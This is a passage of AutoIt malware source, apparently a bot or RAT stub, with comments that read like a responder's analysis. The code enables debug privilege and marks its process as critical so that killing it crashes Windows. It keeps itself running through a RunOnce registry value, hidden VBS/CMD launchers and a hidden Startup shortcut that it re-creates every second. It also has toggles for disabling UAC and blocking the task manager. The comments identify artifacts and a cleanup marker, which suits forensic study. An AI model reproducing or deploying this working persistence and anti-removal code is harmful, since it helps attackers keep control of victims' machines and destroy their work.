Return "![>] ERROR : BSOD OF PROCESS [ " & $_d210hfghdfg5gdfdfdddgdfgdfg4f5f64g65dfghfghfgh5 & " ] NOT CHANGED , ERROR CODE : " & Hex($result[0], 8)
EndIf
EndFunc
; Enables ($status=True) or disables SeDebugPrivilege on the current thread
; token. Called with True from __bsod() before every NtSetInformationProcess;
; nothing in the visible code ever calls it with False, so the privilege
; stays enabled for the life of the process. Returns _security__setprivilege's
; boolean result (the variable name $ilasterror is misleading).
Func __debuge_privilege($status)
Local $htoken, $ilasterror
$htoken = _security__openthreadtokenex(BitOR($token_adjust_privileges, $token_query))
If @error Then Return SetError(@error, @extended, 0)
$ilasterror = _security__setprivilege($htoken, "SEDEBUGPRIVILEGE", $status)
_winapi_closehandle($htoken)
Return $ilasterror
EndFunc
; Clear the critical-process flag on normal script exit (see exitme) so the
; stub can terminate itself without bugchecking the machine.
OnAutoItExitRegister("exitme")
; Exit handler: un-flags $scriptname as a critical process. Note this only
; runs on an orderly AutoIt exit — an external kill never reaches it, which
; is exactly the case the BSOD flag is meant to punish.
Func exitme()
__bsod($scriptname, False)
EndFunc
; "antibotkill" toggle: when enabled, antibotkill() runs every 1000 ms and
; re-creates the persistence artifacts below, so deleting the RunOnce value
; or the start.* files is undone within a second while the stub is alive.
Local $antibotkill = IniRead($uniscriptdir & "\settings.ini", "antibotkill-1", "antibotkill-2", "NotFound")
If $antibotkill = "antibotkill-3" Then
AdlibRegister("antibotkill", 1000)
Else
EndIf
; Persistence (re)installer, run on a 1 s timer. Artifacts to hunt for
; (with <dir> = the $path value set at the top of the script):
;   HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce\<dir>
;       = %USERPROFILE%\<dir>\start.vbs        (64-bit registry view)
;   %USERPROFILE%\<dir>\start.vbs   -> runs start.cmd hidden via WScript.Shell
;   %USERPROFILE%\<dir>\start.cmd   -> cd into <dir>, start <autoit3> "<script>"
;   %STARTUP%\start.lnk             -> start.vbs, attributes +S +H
; Each artifact is only rewritten when missing/changed, so file mtimes may
; not reflect the infection time.
Func antibotkill()
$getstart = RegRead("HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce", $path)
If $getstart = $unicode_userprofile & "\" & $path & "\start.vbs" Then
Else
RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce", $path, "REG_SZ", $unicode_userprofile & "\" & $path & "\start.vbs")
EndIf
If NOT FileExists($unicode_userprofile & "\" & $path & "\start.vbs") Then
Local $vbs = FileOpen($unicode_userprofile & "\" & $path & "\start.vbs", 1)
FileWrite($vbs, "const Hidden = 0" & @CRLF & "const WaitOnReturn = true" & @CRLF & 'File ="""' & $unicode_userprofile & "\" & $path & "\" & 'start.cmd"""' & @CRLF & 'set WshShell = CreateObject("WScript.Shell")' & @CRLF & "WshShell.Run file, Hidden, WaitOnReturn" & @CRLF & "wscript.quit")
FileClose($vbs)
EndIf
If NOT FileExists($unicode_userprofile & "\" & $path & "\start.cmd") Then
; Builder placeholder for the renamed AutoIt3 interpreter file name.
$autoit3 = "autoit3-replace"
Local $bat = FileOpen($unicode_userprofile & "\" & $path & "\start.cmd", 1)
FileWrite($bat, "@echo off" & @CRLF & "cd " & $win_userprofile & $path & "\" & @CRLF & "start " & $autoit3 & " " & '"' & @ScriptName & '"')
FileClose($bat)
EndIf
If NOT FileExists($unicode_startup & "\start.lnk") Then
FileCreateShortcut($unicode_userprofile & "\" & $path & "\start.vbs", $unicode_startup & "\start.lnk")
; Hidden + System so the shortcut is not shown in a default Explorer view.
FileSetAttrib($unicode_startup & "\start.lnk", "+SH")
EndIf
EndFunc
; "persistence" toggle: drops run.vbs next to the script once, then registers
; a persistence() callback every 500 ms. persistence() itself is not in this
; excerpt.
Local $persistence = IniRead($uniscriptdir & "\settings.ini", "persistence1", "persistence2", "NotFound")
If $persistence = "persistence3" Then
checkvbs()
AdlibRegister("persistence", 500)
Else
EndIf
; Drops <scriptdir>\run.vbs if absent: a one-line WScript.Shell launcher that
; re-runs this script through the renamed interpreter ("replace-autoit3.exe"
; is a builder placeholder). FileWrite with a path argument opens, writes
; and closes the file itself.
Func checkvbs()
If NOT FileExists($uniscriptdir & "\run.vbs") Then
FileWrite($uniscriptdir & "\run.vbs", "Set WshShell = WScript.CreateObject(" & '"' & "WScript.Shell" & '")' & @CRLF & "WshShell.Run" & '"' & "replace-autoit3.exe " & @ScriptName & '"')
EndIf
EndFunc
; Remaining feature toggles (same "<name>1"/"<name>2"/"<name>3" sentinel
; scheme). systemhide(), antitask() and disable_uac() are registered as
; 500 ms timers; their bodies are outside this excerpt.
Local $systemhide = IniRead($uniscriptdir & "\settings.ini", "systemhide1", "systemhide2", "NotFound")
If $systemhide = "systemhide3" Then
AdlibRegister("systemhide", 500)
Else
EndIf
Local $antitask = IniRead($uniscriptdir & "\settings.ini", "antitask1", "antitask2", "NotFound")
If $antitask = "antitask3" Then
AdlibRegister("antitask", 500)
Else
EndIf
Local $uac = IniRead($uniscriptdir & "\settings.ini", "uac1", "uac2", "NotFound")
If $uac = "uac3" Then
AdlibRegister("disable_uac", 500)
Else
EndIf
; If any resident feature is on, park the script in loop() so the Adlib
; timers keep firing. loop() never returns (While 1 with no exit), so only
; the first matching If below ever executes; the rest are unreachable.
If $uac = "uac3" Then
loop()
EndIf
If $systemhide = "systemhide3" Then
loop()
EndIf
; NOTE(review): compares against "antitask" rather than the "antitask3"
; sentinel used above, so this branch never matches. Author's bug; left as is.
If $antitask = "antitask" Then
loop()
EndIf
If $antibotkill = "antibotkill-3" Then
loop()
EndIf
If $mutex = "mutex3" Then
loop()
EndIf
If $protectprocess = "protectprocess3" Then
loop()
EndIf
If $persistence = "persistence3" Then
loop()
EndIf
; Resident idle loop (never returns). Every 100 ms it:
;  - checks for %USERPROFILE%\ds\clean.txt and, if present, clears the
;    critical-process flag on $scriptname — an operator kill-switch/cleanup
;    marker, presumably so the stub can then be terminated safely; and
;  - if a window titled $path exists, calls bsod(), which is not defined in
;    the visible portion of this file (likely the deliberate-crash path —
;    confirm against the full listing).
; Creating the clean.txt marker before killing the interpreter is the safe
; order for a responder who is working live on an infected host.
Func loop()
While 1
If FileExists($unicode_userprofile & "\ds\clean.txt") Then
__bsod($scriptname, False)
EndIf
If WinExists($path) Then
bsod()
Else
EndIf
Sleep(100)
WEnd
EndFunc